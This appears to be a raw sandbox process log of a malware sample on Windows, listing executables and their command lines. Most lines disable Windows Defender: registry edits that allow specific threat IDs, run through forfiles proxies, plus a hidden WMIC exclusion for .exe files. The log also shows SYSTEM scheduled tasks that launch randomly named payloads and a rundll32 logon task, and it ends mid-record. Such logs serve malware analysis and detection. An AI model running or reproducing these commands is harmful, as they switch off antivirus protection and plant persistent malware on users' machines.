reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3304 --field-trial-handle=2320,i,2118105858505851151,17184989969443075646,131072 /prefetch:1
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4660 --field-trial-handle=2320,i,2118105858505851151,17184989969443075646,131072 /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bsuAwLimisXNmJFuDt" /SC once /ST 01:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\YsdiyzJB\bmmOwtb.exe\" gs /S" /V1 /F
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C schtasks /run /I /tn bsuAwLimisXNmJFuDt"
C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn bsuAwLimisXNmJFuDt
\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn bsuAwLimisXNmJFuDt
C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\YsdiyzJB\bmmOwtb.exe
C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\YsdiyzJB\bmmOwtb.exe gs /S
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4572 --field-trial-handle=2320,i,2118105858505851151,17184989969443075646,131072 /prefetch:1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4696 --field-trial-handle=2320,i,2118105858505851151,17184989969443075646,131072 /prefetch:1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5272 --field-trial-handle=2320,i,2118105858505851151,17184989969443075646,131072 /prefetch:1
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "iHAtfpaAUcCnRIDUD" /SC once /ST 00:34:29 /RU "SYSTEM" /TR "\"C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\AAnZBgL.exe\" O3 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "iHAtfpaAUcCnRIDUD"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\AAnZBgL.exe
C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\AAnZBgL.exe O3 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 6172 -ip 6172
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6172 -s 608
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5764 --field-trial-handle=2320,i,2118105858505851151,17184989969443075646,131072 /prefetch:1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5956 --field-trial-handle=2320,i,2118105858505851151,17184989969443075646,131072 /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bsuAwLimisXNmJFuDt"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\dTyeYvmCU\JlOjYQ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yoGdnYnzlZOyEUZ" /V1 /F
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "yoGdnYnzlZOyEUZ2" /F /xml "C:\Program Files (x86)\dTyeYvmCU\ghnFKae.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "yoGdnYnzlZOyEUZ"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "yoGdnYnzlZOyEUZ"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bUjWiYKnFLBNBg" /F /xml "C:\Program Files (x86)\EJgSdoUbjkoU2\ORdwwun.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MXVPsGGZsUdpk2" /F /xml "C:\ProgramData\SFedefwyVZzcKDVB\YxLeKgR.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
